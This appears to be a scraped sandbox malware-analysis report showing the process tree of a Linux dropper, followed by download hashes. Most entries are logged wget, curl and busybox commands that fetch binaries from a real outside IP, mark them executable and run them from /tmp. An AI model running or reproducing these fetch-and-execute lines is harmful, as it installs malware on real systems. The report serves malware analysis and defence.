/bin/rmrm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:939
-
-
/bin/chmodchmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV42⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:946
-
-
/bin/chmodchmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:952
-
-
/bin/chmodchmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX2⤵PID:956
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97